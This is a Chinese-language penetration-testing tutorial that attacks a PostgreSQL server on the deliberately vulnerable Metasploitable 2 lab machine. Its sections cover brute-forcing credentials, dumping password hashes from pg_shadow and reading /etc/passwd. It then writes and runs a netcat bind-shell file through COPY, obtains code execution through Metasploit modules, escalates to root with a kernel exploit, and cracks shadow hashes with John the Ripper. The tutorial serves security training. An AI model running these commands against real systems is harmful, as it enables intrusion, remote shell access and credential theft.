[[197862]]

一、前言

PostgreSQL是一個開源數(shù)據(jù)庫，主要部署于Linux操作系統(tǒng)中。然而，PostgreSQL的兼容性非常好，可以兼容多個操作系統(tǒng)，也能在Windows及MacOS操作系統(tǒng)上運行。如果PostgreSQL數(shù)據(jù)庫沒有被正確配置，并且攻擊者已經事先獲取了憑證信息，那么他們就可以實施各類攻擊行為，比如讀寫系統(tǒng)文件以及執(zhí)行任意代碼等。

我之所以寫這篇文章，目的在于為滲透測試人員提供測試PostgreSQL數(shù)據(jù)庫的具體方法。文章中用來演示的目標系統(tǒng)是Metasploitable 2，因為該系統(tǒng)包含許多漏洞，也存在配置不當問題。

二、服務探測及版本識別

PostgreSQL數(shù)據(jù)庫的默認監(jiān)聽端口為5432。在端口掃描過程中，如果發(fā)現(xiàn)該端口開放，那么目標主機很有可能安裝了PostgreSQL。

nmap -sV 192.168.100.11 -p 5432 

圖1. PostgreSQL：通過Nmap判斷數(shù)據(jù)庫版本

此外，Metasploit平臺中也有一個模塊可以用來識別PostgreSQL數(shù)據(jù)庫以及具體的版本：

auxiliary/scanner/postgres/postgres_version

圖2. PostgreSQL：通過Metasploit識別數(shù)據(jù)庫版本

三、探測數(shù)據(jù)庫憑證

在共享文件夾中發(fā)現(xiàn)包含數(shù)據(jù)庫用戶名及密碼的配置文件并不稀奇，然而，如果目標沒有犯下如此低級的失誤，那么我們可以使用一個Metasploit模塊暴力破解數(shù)據(jù)庫憑證，如下圖所示：

auxiliary/scanner/postgres/postgres_login 

圖3. PostgreSQL：暴力破解數(shù)據(jù)庫憑證

探測數(shù)據(jù)庫憑證是非常關鍵的一個步驟，如果沒有掌握正確的憑證，我們很難突破目標主機，因為大多數(shù)攻擊操作都需要訪問數(shù)據(jù)庫。

四、訪問數(shù)據(jù)庫

Kali Linux系統(tǒng)中默認包含了psql工具，在已知數(shù)據(jù)庫用戶名及密碼的前提下，我們可以使用這個工具通過PostgreSQL數(shù)據(jù)的認證過程。命令如下：

psql -h 192.168.100.11 -U postgres 

圖4. PostgreSQL：訪問數(shù)據(jù)庫

一旦連接上數(shù)據(jù)庫，我們應該執(zhí)行如下操作：

1、枚舉已有的數(shù)據(jù)庫。

2、枚舉數(shù)據(jù)庫用戶。

3、枚舉數(shù)據(jù)庫表。

4、讀取表內容。

5、讀取數(shù)據(jù)庫密碼。

6、導出數(shù)據(jù)庫內容。

我們可以使用如下命令完成上述任務：

postgres-# \l 
 
postgres-# \du 
 
template1=# \dt 
 
template1=# SELECT * FROM users; 
 
postgres-# SELECT usename, passwd FROM pg_shadow; 
 
pg_dump --host=192.168.100.11 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump 

圖5. PostgreSQL：枚舉已有的數(shù)據(jù)庫

圖6. PostgreSQL：枚舉數(shù)據(jù)庫用戶

圖7. PostgreSQL：枚舉已有表

圖8. PostgreSQL：讀取表內容

圖9. PostgreSQL：讀取數(shù)據(jù)庫密碼

圖10. PostgreSQL：導出數(shù)據(jù)庫內容

我們也可以使用Metasploit完成上述部分任務。命令如下：

auxiliary/admin/postgres/postgres_sql 
 
auxiliary/scanner/postgres/postgres_hashdump  

圖11. PostgreSQL：使用Metasploit枚舉數(shù)據(jù)庫 

圖12. 使用Metasploit讀取Postgres服務器哈希

圖13. 使用Metasploit執(zhí)行PostgreSQL命令

五、命令執(zhí)行

PostgreSQL數(shù)據(jù)庫能夠與底層系統(tǒng)交互，這樣數(shù)據(jù)庫管理員就能執(zhí)行各種數(shù)據(jù)庫命令，同時也能從系統(tǒng)中讀取輸出結果。

postgres=# select pg_ls_dir('./'); 

圖14. PostgreSQL：讀取系統(tǒng)目錄結構

執(zhí)行如下命令，我們就能讀取服務端的postgres文件。

postgres=# select pg_read_file('PG_VERSION', 0, 200); 

圖15. PostgreSQL：讀取服務端文件

我們也可以創(chuàng)建一個數(shù)據(jù)表，以便存儲及查看目標主機中已有的某個文件。命令如下：

postgres-# CREATE TABLE temp(t TEXT); 
 
postgres-# COPY temp FROM '/etc/passwd'; 
 
postgres-# SELECT * FROM temp limit 1 offset 0;  

圖16. PostgreSQL：讀取本地文件

Metasploit框架中有個模塊，可以自動化讀取本地文件，命令如下：

auxiliary/admin/postgres/postgres_readfile 

圖17. PostgreSQL：通過Metasploit讀取本地文件

除了讀取文件內容外，我們也可以使用PostgreSQL往目標主機中寫入文件，比如我們可以寫入bash文件，用來監(jiān)聽某個隨機端口：

postgres=# CREATE TABLE pentestlab (t TEXT); 
 
postgres=# INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash'); 
 
postgres=# SELECT * FROM pentestlab; 
 
postgres=# COPY pentestlab(t) TO '/tmp/pentestlab';  

圖18. PostgreSQL：將文件寫入目標主機

當然我們需要賦予該文件可執(zhí)行權限：

chmod +x pentestlab 
 
./pentestlab 

圖19. 啟動本地監(jiān)聽器

使用Netcat成功建立連接：

nc -vn 192.168.100.11 2346 
 
python -c "import pty;pty.spawn('/bin/bash')" 

圖20. PostgreSQL：連接到后門

如果postgres服務賬戶具備/tmp目錄的寫入權限，那么我們可以通過用戶自定義函數(shù)(UDF，user defined functions)實現(xiàn)任意代碼執(zhí)行。

exploit/linux/postgres/postgres_payload 

圖21. PostgreSQL：代碼執(zhí)行

六、權限提升

如果我們通過已獲取的數(shù)據(jù)庫憑證或其他方法獲得對目標主機的訪問權限，那么接下來我們應當嘗試將已有權限提升至root權限。當然，我們在Linux系統(tǒng)中可以有各種方法實現(xiàn)權限提升，并且這也是比較復雜的一個過程，但為了不偏離本文的主題，我們使用某個內核漏洞完成權限提升任務。

盡可能完整地獲取內核版本以及操作系統(tǒng)的全部信息有助于我們發(fā)現(xiàn)系統(tǒng)存在哪些漏洞，命令如下：

user@metasploitable:/# uname -a 
 
uname -a 
 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux  

根據(jù)上述內核版本信息，我們可以在exploitdb中搜索對應版本是否存在本地漏洞利用代碼，這也是目前最為簡單的一種方法。

圖22. 搜索Linux內核漏洞利用代碼

我們可以在本地或者遠程系統(tǒng)中編譯這段利用代碼。

圖23. 編譯漏洞利用程序并獲取netlink的PID信息

這個漏洞利用程序需要在/tmp目錄中創(chuàng)建一個run文件。當漏洞利用代碼執(zhí)行時就會運行這個文件，我們可以通過該文件監(jiān)聽某個端口。

#!/bin/bash 
 
nc -lvvp 2345 -e /bin/bash  

圖24. 在tmp目錄中創(chuàng)建run文件

需要賦予該文件可執(zhí)行權限。

chmod +x /tmp/run 

我們可以通過如下命令，建立與該端口的連接，然后獲得root權限下的python shell接口。

nc -vn 192.168.100.11 2345 
 
python -c "import pty;pty.spawn('/bin/bash')" 

圖25. 通過Netcat與目標主機建立連接

我們可以使用Metasploit平臺自動完成上述過程。因此當我們發(fā)現(xiàn)目標主機存在某個漏洞時，我們可以嘗試在Metasploit中搜索是否有個匹配的模塊可以使用：

圖26. 利用Metasploit實現(xiàn)Linux系統(tǒng)權限提升

當漏洞利用代碼執(zhí)行時，我們可以得到另一個具備root用戶權限的Meterpreter會話：

圖27. root權限下的Meterpreter會話

即使我們已經獲得了root訪問權限，我們最好還是從shadow文件中讀取所有用戶的密碼哈希，以便后續(xù)破解這些哈希值。通過這些哈希值，滲透測試人員可以發(fā)現(xiàn)存在弱口令的賬戶，也很有可能借助其中某些賬戶訪問同一網(wǎng)絡中的其他系統(tǒng)。

圖28. 檢查Shadow文件

我們可以將密碼哈希值保存到一個文本文件中，然后使用John the Ripper工具破解這些哈希：

john /root/Desktop/password.txt 
 
john --show /root/Desktop/password.txt 

圖29. 被破解的哈希值

上述命令可以顯示已被成功破解的密碼哈希值。

現(xiàn)在，這個Linux系統(tǒng)中的所有賬戶已被我們破解，我們可以使用這些賬戶訪問其他系統(tǒng)。